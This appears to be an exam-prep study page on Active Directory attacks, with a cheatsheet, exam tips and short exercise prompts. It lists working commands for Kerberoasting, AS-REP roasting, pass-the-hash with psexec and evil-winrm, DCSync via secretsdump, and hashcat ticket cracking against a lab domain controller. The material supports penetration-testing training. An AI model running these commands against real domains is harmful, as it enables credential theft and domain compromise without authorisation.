Active Directory Attacks
Active Directory
Overview
Common AD attack techniques: Kerberoasting, AS-REP Roasting, Pass-the-Hash, DCSync.
4
Exercises
4
Flashcards
1
Mind Maps
Cheatsheet
Kerberoasting
GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.5 -request # Request TGS for Kerberoasting hashcat -m 13100 krb5tgs.txt wordlist.txt # Crack TGS hashes
AS-REP Roasting
GetNPUsers.py domain/ -usersfile users.txt -dc-ip 10.10.10.5 # Check for AS-REP Roasting (no pre-auth)
Pass-the-Hash
impacket-psexec -hashes :NTHASH user@10.10.10.5 # Pass-the-Hash with PsExec evil-winrm -i 10.10.10.5 -u user -H NTHASH # Pass-the-Hash with Evil-WinRM
DCSync
secretsdump.py domain/user:pass@10.10.10.5 # DCSync to dump domain hashes (needs rights)
Command Examples
Common Pitfalls
- Using wrong hash format
- Not trying PTH when creds fail
Exam Survival Tips
- Check for unconstrained delegation
- Look for GenericAll permissions
Exercises
View All
fill command
hard
Write the Impacket command to perform Kerberoasting against domain.local (user:pass, DC at 10.10.10....
multiple choice
medium
What hashcat mode is used for Kerberos TGS (Kerberoast) tickets?...
fill command
hard
Write the secretsdump command to DCSync as domain\admin with password P@ssw0rd from DC at 10.10.10.5...
multiple choice
hard
What Active Directory attack extracts the entire domain password database?...